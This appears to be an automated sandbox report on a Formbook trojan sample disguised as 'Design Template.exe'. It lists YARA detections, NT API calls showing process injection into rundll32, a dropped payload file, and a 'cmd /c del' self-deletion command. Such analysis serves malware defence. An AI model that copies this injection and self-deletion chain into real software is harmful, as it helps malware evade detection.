        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434168 NtCreateFile,2_2_00434168
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043816D NtTerminateProcess,2_2_0043816D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A3B8 NtCreateFile,NtCreateSection,NtMapViewOfSection,2_2_0043A3B8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A5B8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,2_2_0043A5B8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434678 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,2_2_00434678
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004356B8 NtWriteFile,NtCreateSection,NtClose,2_2_004356B8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00433FF8 NtAllocateVirtualMemory,2_2_00433FF8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434798 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,2_2_00434798
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043501A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,2_2_0043501A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434D27 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,2_2_00434D27
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_00A498F0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,4_2_00A49860
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49840 NtDelayExecution,LdrInitializeThunk,4_2_00A49840
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A499A0 NtCreateSection,LdrInitializeThunk,4_2_00A499A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00A49910
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A20 NtResumeThread,LdrInitializeThunk,4_2_00A49A20
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_00A49A00
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A50 NtCreateFile,LdrInitializeThunk,4_2_00A49A50
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A495D0 NtClose,LdrInitializeThunk,4_2_00A495D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49540 NtReadFile,LdrInitializeThunk,4_2_00A49540
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00A496E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00A49660
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00A497A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,4_2_00A49780
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,4_2_00A49FE0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,4_2_00A49710
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A498A0 NtWriteVirtualMemory,4_2_00A498A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49820 NtEnumerateKey,4_2_00A49820
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4B040 NtSuspendThread,4_2_00A4B040
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A499D0 NtCreateProcessEx,4_2_00A499D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49950 NtQueueApcThread,4_2_00A49950
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A80 NtOpenDirectoryObject,4_2_00A49A80
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A10 NtQuerySection,4_2_00A49A10
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4A3B0 NtGetContextThread,4_2_00A4A3B0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49B00 NtSetValueKey,4_2_00A49B00
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A495F0 NtQueryInformationFile,4_2_00A495F0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49520 NtWaitForSingleObject,4_2_00A49520
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4AD30 NtSetContextThread,4_2_00A4AD30
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49560 NtWriteFile,4_2_00A49560
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A496D0 NtCreateKey,4_2_00A496D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49610 NtEnumerateValueKey,4_2_00A49610
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49670 NtQueryInformationProcess,4_2_00A49670
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49650 NtQueryValueKey,4_2_00A49650
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49730 NtQueryVirtualMemory,4_2_00A49730
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4A710 NtOpenProcessToken,4_2_00A4A710
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49760 NtOpenProcess,4_2_00A49760
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4A770 NtOpenThread,4_2_00A4A770
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49770 NtSetInformationFile,4_2_00A49770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9540 NtReadFile,LdrInitializeThunk,14_2_044C9540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C95D0 NtClose,LdrInitializeThunk,14_2_044C95D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9650 NtQueryValueKey,LdrInitializeThunk,14_2_044C9650
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_044C9660
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C96D0 NtCreateKey,LdrInitializeThunk,14_2_044C96D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C96E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_044C96E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9710 NtQueryInformationToken,LdrInitializeThunk,14_2_044C9710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9FE0 NtCreateMutant,LdrInitializeThunk,14_2_044C9FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9780 NtMapViewOfSection,LdrInitializeThunk,14_2_044C9780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9840 NtDelayExecution,LdrInitializeThunk,14_2_044C9840
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9860 NtQuerySystemInformation,LdrInitializeThunk,14_2_044C9860
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_044C9910
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C99A0 NtCreateSection,LdrInitializeThunk,14_2_044C99A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A50 NtCreateFile,LdrInitializeThunk,14_2_044C9A50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9560 NtWriteFile,14_2_044C9560
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9520 NtWaitForSingleObject,14_2_044C9520
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CAD30 NtSetContextThread,14_2_044CAD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C95F0 NtQueryInformationFile,14_2_044C95F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9670 NtQueryInformationProcess,14_2_044C9670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9610 NtEnumerateValueKey,14_2_044C9610
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9760 NtOpenProcess,14_2_044C9760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CA770 NtOpenThread,14_2_044CA770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9770 NtSetInformationFile,14_2_044C9770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CA710 NtOpenProcessToken,14_2_044CA710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9730 NtQueryVirtualMemory,14_2_044C9730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C97A0 NtUnmapViewOfSection,14_2_044C97A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CB040 NtSuspendThread,14_2_044CB040
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9820 NtEnumerateKey,14_2_044C9820
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C98F0 NtReadVirtualMemory,14_2_044C98F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C98A0 NtWriteVirtualMemory,14_2_044C98A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9950 NtQueueApcThread,14_2_044C9950
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C99D0 NtCreateProcessEx,14_2_044C99D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A00 NtProtectVirtualMemory,14_2_044C9A00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A10 NtQuerySection,14_2_044C9A10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A20 NtResumeThread,14_2_044C9A20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A80 NtOpenDirectoryObject,14_2_044C9A80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9B00 NtSetValueKey,14_2_044C9B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CA3B0 NtGetContextThread,14_2_044CA3B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005081B0 NtCreateFile,14_2_005081B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00508260 NtReadFile,14_2_00508260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005082E0 NtClose,14_2_005082E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00508390 NtAllocateVirtualMemory,14_2_00508390
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005081AA NtCreateFile,14_2_005081AA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050825B NtReadFile,14_2_0050825B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005082DA NtClose,14_2_005082DA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050838A NtAllocateVirtualMemory,14_2_0050838A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004347982_2_00434798
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042C0632_2_0042C063
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042572C2_2_0042572C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00429FD02_2_00429FD0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A04_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD20A84_2_00AD20A8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B0904_2_00A1B090
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD28EC4_2_00AD28EC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC10024_2_00AC1002
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A241204_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0F9004_2_00A0F900
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD22AE4_2_00AD22AE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3EBB04_2_00A3EBB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACDBD24_2_00ACDBD2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD2B284_2_00AD2B28
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1841F4_2_00A1841F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACD4664_2_00ACD466
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A325814_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E04_2_00A1D5E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD25DD4_2_00AD25DD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A00D204_2_00A00D20
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD2D074_2_00AD2D07
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1D554_2_00AD1D55
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD2EF74_2_00AD2EF7
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A26E304_2_00A26E30
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACD6164_2_00ACD616
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1FF14_2_00AD1FF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454D46614_2_0454D466
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449841F14_2_0449841F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551D5514_2_04551D55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04552D0714_2_04552D07
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04480D2014_2_04480D20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045525DD14_2_045525DD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E014_2_0449D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B258114_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454D61614_2_0454D616
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A6E3014_2_044A6E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04552EF714_2_04552EF7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551FF114_2_04551FF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454100214_2_04541002
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045528EC14_2_045528EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B09014_2_0449B090
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A014_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045520A814_2_045520A8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448F90014_2_0448F900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A412014_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045522AE14_2_045522AE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04552B2814_2_04552B28
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454DBD214_2_0454DBD2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BEBB014_2_044BEBB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050C83814_2_0050C838
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F8C4B14_2_004F8C4B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F8C5014_2_004F8C50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F2D9014_2_004F2D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F2FB014_2_004F2FB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: String function: 00422DE8 appears 49 times
        Source: C:\Users\user\Desktop\Design Template.exeCode function: String function: 00A0B150 appears 35 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0448B150 appears 35 times
        Source: Liebert.bmp.2.drStatic PE information: No import functions for PE file found
        Source: Design Template.exe, 00000004.00000002.329749944.0000000002629000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Design Template.exe
        Source: Design Template.exe, 00000004.00000002.329471350.0000000000C8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Design Template.exe
        Source: Design Template.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Liebert.bmp.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: Liebert.bmp.2.drStatic PE information: Section .text
        Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/1@15/6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042D194 FindResourceA,LoadResource,LockResource,2_2_0042D194
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user~1\AppData\Local\Temp\Liebert.bmpJump to behavior
        Source: Design Template.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Design Template.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: Design Template.exeVirustotal: Detection: 34%
        Source: unknownProcess created: C:\Users\user\Desktop\Design Template.exe 'C:\Users\user\Desktop\Design Template.exe'
        Source: C:\Users\user\Desktop\Design Template.exeProcess created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Design Template.exeProcess created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'Jump to behavior
        Source: Design Template.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00426369
        Source: Design Template.exeStatic PE information: section name: .cdata
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00422C20 push eax; ret 2_2_00422C4E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00422DE8 push eax; ret 2_2_00422E06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A5D0D1 push ecx; ret 4_2_00A5D0E4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044DD0D1 push ecx; ret 14_2_044DD0E4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F4984 push ebx; ret 14_2_004F4985
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B3F2 push eax; ret 14_2_0050B3F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B3FB push eax; ret 14_2_0050B462
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B3A5 push eax; ret 14_2_0050B3F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B45C push eax; ret 14_2_0050B462
